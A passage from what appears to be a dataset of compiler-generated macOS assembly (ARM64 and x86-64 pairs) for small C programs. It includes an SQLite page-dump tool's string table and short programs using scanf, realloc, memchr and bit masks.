L_.str.1: ## @.str.1
.asciz "Pagesize: %d\n"
.zerofill __DATA,__bss,_mxPage,4,2 ## @mxPage
L_.str.2: ## @.str.2
.asciz "Available pages: 1..%d\n"
L_.str.3: ## @.str.3
.asciz "dbheader"
L_.str.4: ## @.str.4
.asciz "pgidx"
L_.str.5: ## @.str.5
.asciz "ptrmap"
L_.str.6: ## @.str.6
.asciz "help"
L_.str.7: ## @.str.7
.asciz "%s: unknown option: [%s]\n"
L_.str.8: ## @.str.8
.asciz "..end"
L_.str.9: ## @.str.9
.asciz "Page argument should be LOWER?..UPPER?. Range 1 to %d\n"
L_.str.10: ## @.str.10
.asciz "Usage %s FILENAME ?args...?\n\n"
L_.str.11: ## @.str.11
.asciz "args:\n dbheader Show database header\n pgidx Index of how each page is used\n ptrmap Show all PTRMAP page content\n NNN..MMM Show hex of pages NNN through MMM\n NNN..end Show hex of pages NNN through end of file\n NNNb Decode btree page NNN\n NNNbc Decode btree page NNN and show content\n NNNbm Decode btree page NNN and show a layout map\n NNNbdCCC Decode cell CCC on btree page NNN\n NNNt Decode freelist trunk page NNN\n NNNtd Show leaf freelist pages on the decode\n NNNtr Recursively decode freelist starting at NNN\n"
L_.str.12: ## @.str.12
.asciz "Page %d: (offsets 0x%x..0x%x)\n"
L_.str.13: ## @.str.13
.asciz " %03x: "
L_.str.14: ## @.str.14
.asciz " %04x: "
L_.str.15: ## @.str.15
.asciz " %05x: "
L_.str.16: ## @.str.16
.asciz " %06x: "
L_.str.17: ## @.str.17
.asciz " %08x: "
.section __DATA,__data
.p2align 2 ## @perLine
_perLine:
.long 16 ## 0x10
.section __TEXT,__cstring,cstring_literals
L_.str.18: ## @.str.18
.asciz " "
L_.str.19: ## @.str.19
.asciz "%02x "
L_.str.20: ## @.str.20
.asciz " "
L_.str.21: ## @.str.21
.asciz "%c"
L_.str.22: ## @.str.22
.asciz "\n"
L_.str.23: ## @.str.23
.asciz "Decoded:\n"
L_.str.24: ## @.str.24
.asciz "Database page size"
L_.str.25: ## @.str.25
.asciz "File format write version"
L_.str.26: ## @.str.26
.asciz "File format read version"
L_.str.27: ## @.str.27
.asciz "Reserved space at end of page"
L_.str.28: ## @.str.28
.asciz "File change counter"
L_.str.29: ## @.str.29
.asciz "Size of database in pages"
L_.str.30: ## @.str.30
.asciz "Page number of first freelist page"
L_.str.31: ## @.str.31
.asciz "Number of freelist pages"
L_.str.32: ## @.str.32
.asciz "Schema cookie"
L_.str.33: ## @.str.33
.asciz "Schema format version"
L_.str.34: ## @.str.34
.asciz "Default page cache size"
L_.str.35: ## @.str.35
.asciz "Largest auto-vac root page"
L_.str.36: ## @.str.36
.asciz "Text encoding"
L_.str.37: ## @.str.37
.asciz "User version"
L_.str.38: ## @.str.38
.asciz "Incremental-vacuum mode"
L_.str.39: ## @.str.39
.asciz "Application ID"
L_.str.40: ## @.str.40
.asciz "meta[8]"
L_.str.41: ## @.str.41
.asciz "meta[9]"
L_.str.42: ## @.str.42
.asciz "meta[10]"
L_.str.43: ## @.str.43
.asciz "meta[11]"
L_.str.44: ## @.str.44
.asciz "meta[12]"
L_.str.45: ## @.str.45
.asciz "Change counter for version number"
L_.str.46: ## @.str.46
.asciz "SQLite version number"
L_.str.47: ## @.str.47
.asciz " %03x: %02x"
L_.str.48: ## @.str.48
.asciz " %02x"
L_.str.49: ## @.str.49
.asciz " %9d"
L_.str.50: ## @.str.50
.asciz "%s %s\n"
L_.str.51: ## @.str.51
.asciz "empty database\n"
L_.str.52: ## @.str.52
.asciz "cannot open database: %s\n"
.zerofill __DATA,__bss,_zPageUse,8,3 ## @zPageUse
L_.str.53: ## @.str.53
.asciz "sqlite_master"
L_.str.54: ## @.str.54
.asciz "PRAGMA writable_schema=ON"
L_.str.55: ## @.str.55
.asciz "SELECT type, name, rootpage FROM SQLITE_MASTER WHERE rootpage ORDER BY rowid %s"
L_.str.56: ## @.str.56
.asciz "DESC"
L_.str.57: ## @.str.57
.space 1
L_.str.58: ## @.str.58
.asciz "ERROR: cannot query database: %s\n"
L_.str.59: ## @.str.59
.asciz "%5d: %s\n"
L_.str.60: ## @.str.60
.asciz "???"
L_.str.61: ## @.str.61
.asciz "Out of memory...\n"
L_.str.62: ## @.str.62
.asciz "freelist trunk #%d child of %d"
L_.str.63: ## @.str.63
.asciz "freelist leaf, child %d of trunk page %d"
L_.str.64: ## @.str.64
.asciz "ERROR: page %d out of range 1..%d: %s\n"
L_.str.65: ## @.str.65
.asciz "ERROR: page %d used multiple times:\n"
L_.str.66: ## @.str.66
.asciz "ERROR: previous: %s\n"
L_.str.67: ## @.str.67
.asciz "ERROR: current: %s\n"
L_.str.68: ## @.str.68
.asciz "PTRMAP page covering %d..%d"
L_.str.69: ## @.str.69
.asciz "corrupt node"
L_.str.70: ## @.str.70
.asciz "interior node of index"
L_.str.71: ## @.str.71
.asciz "interior node of table"
L_.str.72: ## @.str.72
.asciz "leaf of index"
L_.str.73: ## @.str.73
.asciz "leaf of table"
L_.str.74: ## @.str.74
.asciz "%s [%s], child %d of page %d"
L_.str.75: ## @.str.75
.asciz "root %s [%s]"
L_.str.76: ## @.str.76
.asciz "overflow %d from cell %d of page %d"
L_.str.77: ## @.str.77
.asciz "database does not use PTRMAP pages\n"
L_.str.78: ## @.str.78
.asciz "%5d: root of sqlite_master\n"
L_.str.79: ## @.str.79
.asciz "%5d: PTRMAP page covering %d..%d\n"
L_.str.80: ## @.str.80
.asciz "b-tree root page"
L_.str.81: ## @.str.81
.asciz "freelist page"
L_.str.82: ## @.str.82
.asciz "first page of overflow"
L_.str.83: ## @.str.83
.asciz "later page of overflow"
L_.str.84: ## @.str.84
.asciz "b-tree non-root page"
L_.str.85: ## @.str.85
.asciz "%5d: %s, parent=%u\n"
L_.str.86: ## @.str.86
.asciz "unknown"
L_.str.87: ## @.str.87
.asciz "index interior node"
L_.str.88: ## @.str.88
.asciz "table interior node"
L_.str.89: ## @.str.89
.asciz "index leaf"
L_.str.90: ## @.str.90
.asciz "table leaf"
L_.str.91: ## @.str.91
.asciz "Page %d has only %d cells\n"
L_.str.92: ## @.str.92
.asciz "Header on btree page %d:\n"
L_.str.93: ## @.str.93
.asciz "Offset to first freeblock"
L_.str.94: ## @.str.94
.asciz "Number of cells on this page"
L_.str.95: ## @.str.95
.asciz "Offset to cell content area"
L_.str.96: ## @.str.96
.asciz "Fragmented byte count"
L_.str.97: ## @.str.97
.asciz "Right child"
L_.str.98: ## @.str.98
.asciz " key: lx=left-child n=payload-size r=rowid\n"
L_.str.99: ## @.str.99
.asciz "%d"
L_.str.100: ## @.str.100
.asciz " %03x: cell[%d] %s\n"
L_.str.101: ## @.str.101
.asciz "Page map: (H=header P=cell-index 1=page-1-header .=free-space)\n"
L_.str.102: ## @.str.102
.asciz " %03x: %.64s\n"
.zerofill __DATA,__bss,_describeCell.zDesc,1000,4 ## @describeCell.zDesc
L_.str.103: ## @.str.103
.asciz "lx: %d "
L_.str.104: ## @.str.104
.asciz "n: %lld "
L_.str.105: ## @.str.105
.asciz "r: %lld "
L_.str.106: ## @.str.106
.asciz "ov: %d "
L_.str.107: ## @.str.107
.asciz "*"
L_.str.108: ## @.str.108
.asciz "%lld"
L_.str.109: ## @.str.109
.asciz "real"
L_.str.110: ## @.str.110
.asciz "0"
L_.str.111: ## @.str.111
.asciz "1"
L_.str.112: ## @.str.112
.asciz "blob(%lld)"
L_.str.113: ## @.str.113
.asciz "txt(%lld)"
L_.str.114: ## @.str.114
.asciz "Cell[%d]:\n"
L_.str.115: ## @.str.115
.asciz "left child page:: %d\n"
L_.str.116: ## @.str.116
.asciz "payload-size: %lld\n"
L_.str.117: ## @.str.117
.asciz "payload-size: %lld (%lld local, %lld overflow)\n"
L_.str.118: ## @.str.118
.asciz "rowid: %lld\n"
L_.str.119: ## @.str.119
.asciz "record-header-size: %d\n"
L_.str.120: ## @.str.120
.asciz "typecode[%d]: %d - "
L_.str.121: ## @.str.121
.asciz "NULL"
L_.str.122: ## @.str.122
.asciz "int8"
L_.str.123: ## @.str.123
.asciz "int16"
L_.str.124: ## @.str.124
.asciz "int24"
L_.str.125: ## @.str.125
.asciz "int32"
L_.str.126: ## @.str.126
.asciz "int48"
L_.str.127: ## @.str.127
.asciz "int64"
L_.str.128: ## @.str.128
.asciz "double"
L_.str.129: ## @.str.129
.asciz "zero"
L_.str.130: ## @.str.130
.asciz "one"
L_.str.131: ## @.str.131
.asciz "error"
L_.str.132: ## @.str.132
.asciz "blob(%d)"
L_.str.133: ## @.str.133
.asciz "text(%d)"
L_.str.134: ## @.str.134
.asciz "%s\n"
L_.str.135: ## @.str.135
.asciz "data[%d]: "
L_.str.136: ## @.str.136
.asciz "%#g\n"
L_.str.137: ## @.str.137
.asciz "%lld\n"
L_.str.138: ## @.str.138
.asciz "%02x"
L_.str.139: ## @.str.139
.asciz "...'"
L_.str.140: ## @.str.140
.asciz "'"
L_.str.141: ## @.str.141
.asciz "... %lld bytes of content ...\n"
L_.str.142: ## @.str.142
.asciz "overflow-page: %d\n"
L_.str.143: ## @.str.143
.asciz "Decode of freelist trunk page %d:\n"
L_.str.144: ## @.str.144
.asciz "Next freelist trunk page"
L_.str.145: ## @.str.145
.asciz "Number of entries on this page"
L_.str.146: ## @.str.146
.asciz "[%d]"
L_.str.147: ## @.str.147
.asciz " %5s %7u"
.subsections_via_symbols
| the_stack_data/55371.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ; -- Begin function main
.p2align 2
_main: ; @main
.cfi_startproc
; %bb.0:
stp x29, x30, [sp, #-16]! ; 16-byte Folded Spill
.cfi_def_cfa_offset 16
mov x29, sp
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
sub sp, sp, #80
adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
stur x8, [x29, #-8]
stur wzr, [x29, #-12]
stur wzr, [x29, #-20]
stur wzr, [x29, #-24]
b LBB0_1
LBB0_1: ; =>This Loop Header: Depth=1
; Child Loop BB0_2 Depth 2
; Child Loop BB0_6 Depth 2
ldur w8, [x29, #-20]
; kill: def $x8 killed $w8
mov x9, sp
stur x9, [x29, #-40]
lsr x9, x8, #0
add x9, x9, #15
and x9, x9, #0xfffffffffffffff0
stur x9, [x29, #-64] ; 8-byte Folded Spill
adrp x16, ___chkstk_darwin@GOTPAGE
ldr x16, [x16, ___chkstk_darwin@GOTPAGEOFF]
blr x16
ldur x10, [x29, #-64] ; 8-byte Folded Reload
mov x9, sp
subs x9, x9, x10
mov sp, x9
stur x9, [x29, #-56] ; 8-byte Folded Spill
stur x8, [x29, #-48]
stur wzr, [x29, #-16]
b LBB0_2
LBB0_2: ; Parent Loop BB0_1 Depth=1
; => This Inner Loop Header: Depth=2
ldur w8, [x29, #-16]
ldur w9, [x29, #-20]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB0_5
b LBB0_3
LBB0_3: ; in Loop: Header=BB0_2 Depth=2
ldur x8, [x29, #-56] ; 8-byte Folded Reload
ldursw x9, [x29, #-16]
add x8, x8, x9
sub sp, sp, #16
mov x9, sp
str x8, [x9]
adrp x0, l_.str@PAGE
add x0, x0, l_.str@PAGEOFF
bl _scanf
add sp, sp, #16
b LBB0_4
LBB0_4: ; in Loop: Header=BB0_2 Depth=2
ldur w8, [x29, #-16]
add w8, w8, #1
stur w8, [x29, #-16]
b LBB0_2
LBB0_5: ; in Loop: Header=BB0_1 Depth=1
ldur w8, [x29, #-16]
stur w8, [x29, #-28]
b LBB0_6
LBB0_6: ; Parent Loop BB0_1 Depth=1
; => This Inner Loop Header: Depth=2
ldur w8, [x29, #-28]
subs w8, w8, #0
cset w8, le
tbnz w8, #0, LBB0_9
b LBB0_7
LBB0_7: ; in Loop: Header=BB0_6 Depth=2
ldur x8, [x29, #-56] ; 8-byte Folded Reload
ldursw x9, [x29, #-28]
ldrsb w10, [x8, x9]
sub sp, sp, #16
mov x9, sp
; implicit-def: $x8
mov x8, x10
str x8, [x9]
adrp x0, l_.str@PAGE
add x0, x0, l_.str@PAGEOFF
bl _printf
add sp, sp, #16
b LBB0_8
LBB0_8: ; in Loop: Header=BB0_6 Depth=2
ldur w8, [x29, #-28]
subs w8, w8, #1
stur w8, [x29, #-28]
b LBB0_6
LBB0_9: ; in Loop: Header=BB0_1 Depth=1
adrp x0, l_.str.1@PAGE
add x0, x0, l_.str.1@PAGEOFF
bl _printf
sub sp, sp, #16
mov x9, sp
sub x8, x29, #20
str x8, [x9]
adrp x0, l_.str.2@PAGE
add x0, x0, l_.str.2@PAGEOFF
bl _scanf
add sp, sp, #16
ldur x8, [x29, #-40]
mov sp, x8
b LBB0_10
LBB0_10: ; in Loop: Header=BB0_1 Depth=1
ldur w8, [x29, #-20]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB0_1
b LBB0_11
LBB0_11:
ldur w8, [x29, #-12]
stur w8, [x29, #-68] ; 4-byte Folded Spill
ldur x9, [x29, #-8]
adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
subs x8, x8, x9
cset w8, eq
tbnz w8, #0, LBB0_13
b LBB0_12
LBB0_12:
bl ___stack_chk_fail
LBB0_13:
ldur w0, [x29, #-68] ; 4-byte Folded Reload
mov sp, x29
ldp x29, x30, [sp], #16 ; 16-byte Folded Reload
ret
.cfi_endproc
; -- End function
.section __TEXT,__cstring,cstring_literals
l_.str: ; @.str
.asciz "%c"
l_.str.1: ; @.str.1
.asciz "\n"
l_.str.2: ; @.str.2
.asciz "%i"
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ## -- Begin function main
.p2align 4, 0x90
_main: ## @main
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $80, %rsp
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq %rax, -8(%rbp)
movl $0, -12(%rbp)
movl $0, -20(%rbp)
movl $0, -24(%rbp)
LBB0_1: ## =>This Loop Header: Depth=1
## Child Loop BB0_2 Depth 2
## Child Loop BB0_6 Depth 2
movl -20(%rbp), %eax
## kill: def $rax killed $eax
movq %rax, -64(%rbp) ## 8-byte Spill
movq %rsp, %rcx
movq %rcx, -40(%rbp)
callq ____chkstk_darwin
addq $15, %rax
andq $-16, %rax
subq %rax, %rsp
movq -64(%rbp), %rax ## 8-byte Reload
movq %rsp, %rcx
movq %rcx, -56(%rbp) ## 8-byte Spill
movq %rax, -48(%rbp)
movl $0, -16(%rbp)
LBB0_2: ## Parent Loop BB0_1 Depth=1
## => This Inner Loop Header: Depth=2
movl -16(%rbp), %eax
cmpl -20(%rbp), %eax
jge LBB0_5
## %bb.3: ## in Loop: Header=BB0_2 Depth=2
movq -56(%rbp), %rsi ## 8-byte Reload
movslq -16(%rbp), %rax
addq %rax, %rsi
leaq L_.str(%rip), %rdi
movb $0, %al
callq _scanf
## %bb.4: ## in Loop: Header=BB0_2 Depth=2
movl -16(%rbp), %eax
addl $1, %eax
movl %eax, -16(%rbp)
jmp LBB0_2
LBB0_5: ## in Loop: Header=BB0_1 Depth=1
movl -16(%rbp), %eax
movl %eax, -28(%rbp)
LBB0_6: ## Parent Loop BB0_1 Depth=1
## => This Inner Loop Header: Depth=2
cmpl $0, -28(%rbp)
jle LBB0_9
## %bb.7: ## in Loop: Header=BB0_6 Depth=2
movq -56(%rbp), %rax ## 8-byte Reload
movslq -28(%rbp), %rcx
movsbl (%rax,%rcx), %esi
leaq L_.str(%rip), %rdi
movb $0, %al
callq _printf
## %bb.8: ## in Loop: Header=BB0_6 Depth=2
movl -28(%rbp), %eax
addl $-1, %eax
movl %eax, -28(%rbp)
jmp LBB0_6
LBB0_9: ## in Loop: Header=BB0_1 Depth=1
leaq L_.str.1(%rip), %rdi
movb $0, %al
callq _printf
leaq L_.str.2(%rip), %rdi
leaq -20(%rbp), %rsi
movb $0, %al
callq _scanf
movq -40(%rbp), %rax
movq %rax, %rsp
## %bb.10: ## in Loop: Header=BB0_1 Depth=1
cmpl $0, -20(%rbp)
jne LBB0_1
## %bb.11:
movl -12(%rbp), %eax
movl %eax, -68(%rbp) ## 4-byte Spill
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq -8(%rbp), %rcx
cmpq %rcx, %rax
jne LBB0_13
## %bb.12:
movl -68(%rbp), %eax ## 4-byte Reload
movq %rbp, %rsp
popq %rbp
retq
LBB0_13:
callq ___stack_chk_fail
ud2
.cfi_endproc
## -- End function
.section __TEXT,__cstring,cstring_literals
L_.str: ## @.str
.asciz "%c"
L_.str.1: ## @.str.1
.asciz "\n"
L_.str.2: ## @.str.2
.asciz "%i"
.subsections_via_symbols
| the_stack_data/132954203.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ; -- Begin function main
.p2align 2
_main: ; @main
.cfi_startproc
; %bb.0:
sub sp, sp, #48
.cfi_def_cfa_offset 48
stp x29, x30, [sp, #32] ; 16-byte Folded Spill
add x29, sp, #32
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur wzr, [x29, #-4]
mov x0, #0
mov x1, #1
bl _realloc
str x0, [sp, #16]
ldr x8, [sp, #16]
subs x8, x8, #0
cset w8, ne
tbnz w8, #0, LBB0_2
b LBB0_1
LBB0_1:
stur wzr, [x29, #-4]
b LBB0_3
LBB0_2:
ldr x0, [sp, #16]
mov x1, #2
bl _realloc
str x0, [sp, #8]
ldr x0, [sp, #8]
bl _free
b LBB0_3
LBB0_3:
ldur w0, [x29, #-4]
ldp x29, x30, [sp, #32] ; 16-byte Folded Reload
add sp, sp, #48
ret
.cfi_endproc
; -- End function
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ## -- Begin function main
.p2align 4, 0x90
_main: ## @main
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $32, %rsp
movl $0, -4(%rbp)
xorl %eax, %eax
movl %eax, %edi
movl $1, %esi
callq _realloc
movq %rax, -16(%rbp)
cmpq $0, -16(%rbp)
jne LBB0_2
## %bb.1:
movl $0, -4(%rbp)
jmp LBB0_3
LBB0_2:
movq -16(%rbp), %rdi
movl $2, %esi
callq _realloc
movq %rax, -24(%rbp)
movq -24(%rbp), %rdi
callq _free
LBB0_3:
movl -4(%rbp), %eax
addq $32, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.subsections_via_symbols
| the_stack_data/212642268.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ; -- Begin function main
.p2align 2
_main: ; @main
.cfi_startproc
; %bb.0:
sub sp, sp, #80
.cfi_def_cfa_offset 80
stp x29, x30, [sp, #64] ; 16-byte Folded Spill
add x29, sp, #64
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
stur x8, [x29, #-8]
stur wzr, [x29, #-20]
adrp x8, l___const.main.target@PAGE
add x8, x8, l___const.main.target@PAGEOFF
ldr x9, [x8]
sub x8, x29, #16
str x8, [sp, #16] ; 8-byte Folded Spill
stur x9, [x29, #-16]
; kill: def $x9 killed $xzr
str xzr, [sp, #32]
str wzr, [sp, #28]
sturb wzr, [x29, #-13]
mov x9, sp
str x8, [x9]
adrp x0, l_.str@PAGE
add x0, x0, l_.str@PAGEOFF
bl _printf
ldr x0, [sp, #16] ; 8-byte Folded Reload
mov w1, #69
mov x2, #7
bl _memchr
str x0, [sp, #32]
ldr x8, [sp, #32]
subs x8, x8, #0
cset w8, ne
tbnz w8, #0, LBB0_2
b LBB0_1
LBB0_1:
adrp x0, l_.str.1@PAGE
add x0, x0, l_.str.1@PAGEOFF
bl _printf
b LBB0_3
LBB0_2:
ldr x8, [sp, #32]
mov x9, sp
str x8, [x9]
adrp x0, l_.str.2@PAGE
add x0, x0, l_.str.2@PAGEOFF
bl _printf
ldr x8, [sp, #32]
sub x9, x29, #16
subs x8, x8, x9
; kill: def $w8 killed $w8 killed $x8
str w8, [sp, #28]
ldr w9, [sp, #28]
; implicit-def: $x8
mov x8, x9
mov x9, sp
str x8, [x9]
adrp x0, l_.str.3@PAGE
add x0, x0, l_.str.3@PAGEOFF
bl _printf
b LBB0_3
LBB0_3:
ldur x9, [x29, #-8]
adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
subs x8, x8, x9
cset w8, eq
tbnz w8, #0, LBB0_5
b LBB0_4
LBB0_4:
bl ___stack_chk_fail
LBB0_5:
mov w0, #0
ldp x29, x30, [sp, #64] ; 16-byte Folded Reload
add sp, sp, #80
ret
.cfi_endproc
; -- End function
.section __TEXT,__cstring,cstring_literals
l___const.main.target: ; @__const.main.target
.asciz "ABCXDEF"
l_.str: ; @.str
.asciz "target = %s\n"
l_.str.1: ; @.str.1
.asciz "Not found!\n"
l_.str.2: ; @.str.2
.asciz "p = %s\n"
l_.str.3: ; @.str.3
.asciz "d = %d\n"
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ## -- Begin function main
.p2align 4, 0x90
_main: ## @main
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $48, %rsp
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq %rax, -8(%rbp)
movl $0, -20(%rbp)
movq L___const.main.target(%rip), %rax
movq %rax, -16(%rbp)
movq $0, -32(%rbp)
movl $0, -36(%rbp)
movb $0, -13(%rbp)
leaq -16(%rbp), %rsi
leaq L_.str(%rip), %rdi
movb $0, %al
callq _printf
leaq -16(%rbp), %rdi
movl $69, %esi
movl $7, %edx
callq _memchr
movq %rax, -32(%rbp)
cmpq $0, -32(%rbp)
jne LBB0_2
## %bb.1:
leaq L_.str.1(%rip), %rdi
movb $0, %al
callq _printf
jmp LBB0_3
LBB0_2:
movq -32(%rbp), %rsi
leaq L_.str.2(%rip), %rdi
movb $0, %al
callq _printf
movq -32(%rbp), %rax
leaq -16(%rbp), %rcx
subq %rcx, %rax
## kill: def $eax killed $eax killed $rax
movl %eax, -36(%rbp)
movl -36(%rbp), %esi
leaq L_.str.3(%rip), %rdi
movb $0, %al
callq _printf
LBB0_3:
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq -8(%rbp), %rcx
cmpq %rcx, %rax
jne LBB0_5
## %bb.4:
xorl %eax, %eax
addq $48, %rsp
popq %rbp
retq
LBB0_5:
callq ___stack_chk_fail
ud2
.cfi_endproc
## -- End function
.section __TEXT,__cstring,cstring_literals
L___const.main.target: ## @__const.main.target
.asciz "ABCXDEF"
L_.str: ## @.str
.asciz "target = %s\n"
L_.str.1: ## @.str.1
.asciz "Not found!\n"
L_.str.2: ## @.str.2
.asciz "p = %s\n"
L_.str.3: ## @.str.3
.asciz "d = %d\n"
.subsections_via_symbols
| the_stack_data/248580870.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _getMask ; -- Begin function getMask
.p2align 2
_getMask: ; @getMask
.cfi_startproc
; %bb.0:
sub sp, sp, #16
.cfi_def_cfa_offset 16
str w0, [sp, #12]
ldr w9, [sp, #12]
ldr w8, [sp, #12]
orr w8, w8, w9, asr #1
str w8, [sp, #12]
ldr w9, [sp, #12]
ldr w8, [sp, #12]
orr w8, w8, w9, asr #2
str w8, [sp, #12]
ldr w9, [sp, #12]
ldr w8, [sp, #12]
orr w8, w8, w9, asr #4
str w8, [sp, #12]
ldr w9, [sp, #12]
ldr w8, [sp, #12]
orr w8, w8, w9, asr #8
str w8, [sp, #12]
ldr w9, [sp, #12]
ldr w8, [sp, #12]
orr w8, w8, w9, asr #16
str w8, [sp, #12]
ldr w0, [sp, #12]
add sp, sp, #16
ret
.cfi_endproc
; -- End function
.globl _bitwiseComplement ; -- Begin function bitwiseComplement
.p2align 2
_bitwiseComplement: ; @bitwiseComplement
.cfi_startproc
; %bb.0:
sub sp, sp, #32
.cfi_def_cfa_offset 32
stp x29, x30, [sp, #16] ; 16-byte Folded Spill
add x29, sp, #16
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur w0, [x29, #-4]
ldur w8, [x29, #-4]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB1_2
b LBB1_1
LBB1_1:
mov w8, #1
str w8, [sp, #8] ; 4-byte Folded Spill
b LBB1_3
LBB1_2:
ldur w0, [x29, #-4]
bl _getMask
ldur w8, [x29, #-4]
bic w8, w0, w8
str w8, [sp, #8] ; 4-byte Folded Spill
b LBB1_3
LBB1_3:
ldr w0, [sp, #8] ; 4-byte Folded Reload
ldp x29, x30, [sp, #16] ; 16-byte Folded Reload
add sp, sp, #32
ret
.cfi_endproc
; -- End function
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _getMask ## -- Begin function getMask
.p2align 4, 0x90
_getMask: ## @getMask
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
movl %edi, -4(%rbp)
movl -4(%rbp), %eax
sarl $1, %eax
orl -4(%rbp), %eax
movl %eax, -4(%rbp)
movl -4(%rbp), %eax
sarl $2, %eax
orl -4(%rbp), %eax
movl %eax, -4(%rbp)
movl -4(%rbp), %eax
sarl $4, %eax
orl -4(%rbp), %eax
movl %eax, -4(%rbp)
movl -4(%rbp), %eax
sarl $8, %eax
orl -4(%rbp), %eax
movl %eax, -4(%rbp)
movl -4(%rbp), %eax
sarl $16, %eax
orl -4(%rbp), %eax
movl %eax, -4(%rbp)
movl -4(%rbp), %eax
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _bitwiseComplement ## -- Begin function bitwiseComplement
.p2align 4, 0x90
_bitwiseComplement: ## @bitwiseComplement
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $16, %rsp
movl %edi, -4(%rbp)
cmpl $0, -4(%rbp)
jne LBB1_2
## %bb.1:
movl $1, %eax
movl %eax, -8(%rbp) ## 4-byte Spill
jmp LBB1_3
LBB1_2:
movl -4(%rbp), %edi
callq _getMask
movl -4(%rbp), %ecx
xorl $-1, %ecx
andl %ecx, %eax
movl %eax, -8(%rbp) ## 4-byte Spill
LBB1_3:
movl -8(%rbp), %eax ## 4-byte Reload
addq $16, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.subsections_via_symbols
| the_stack_data/225142890.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _printf ; -- Begin function printf
.p2align 2
_printf: ; @printf
.cfi_startproc
; %bb.0:
sub sp, sp, #16
.cfi_def_cfa_offset 16
str x0, [sp, #8]
mov w0, #0
add sp, sp, #16
ret
.cfi_endproc
; -- End function
.section __DATA,__data
.globl _a ; @a
.p2align 2
_a:
.long 5 ; 0x5
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _printf ## -- Begin function printf
.p2align 4, 0x90
_printf: ## @printf
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
movq %rdi, -8(%rbp)
xorl %eax, %eax
popq %rbp
retq
.cfi_endproc
## -- End function
.section __DATA,__data
.globl _a ## @a
.p2align 2
_a:
.long 5 ## 0x5
.subsections_via_symbols
| the_stack_data/1017380.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ; -- Begin function main
.p2align 2
_main: ; @main
.cfi_startproc
; %bb.0:
sub sp, sp, #32
.cfi_def_cfa_offset 32
stp x29, x30, [sp, #16] ; 16-byte Folded Spill
add x29, sp, #16
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur wzr, [x29, #-4]
mov w8, #32
sturb w8, [x29, #-5]
b LBB0_1
LBB0_1: ; =>This Inner Loop Header: Depth=1
ldur w8, [x29, #-4]
subs w8, w8, #1
cset w8, ne
tbnz w8, #0, LBB0_3
b LBB0_2
LBB0_2: ; in Loop: Header=BB0_1 Depth=1
adrp x0, l_.str@PAGE
add x0, x0, l_.str@PAGEOFF
bl _printf
stur wzr, [x29, #-4]
b LBB0_27
LBB0_3: ; in Loop: Header=BB0_1 Depth=1
ldur w8, [x29, #-4]
subs w8, w8, #2
cset w8, ne
tbnz w8, #0, LBB0_5
b LBB0_4
LBB0_4: ; in Loop: Header=BB0_1 Depth=1
adrp x0, l_.str.1@PAGE
add x0, x0, l_.str.1@PAGEOFF
bl _printf
stur wzr, [x29, #-4]
b LBB0_26
LBB0_5: ; in Loop: Header=BB0_1 Depth=1
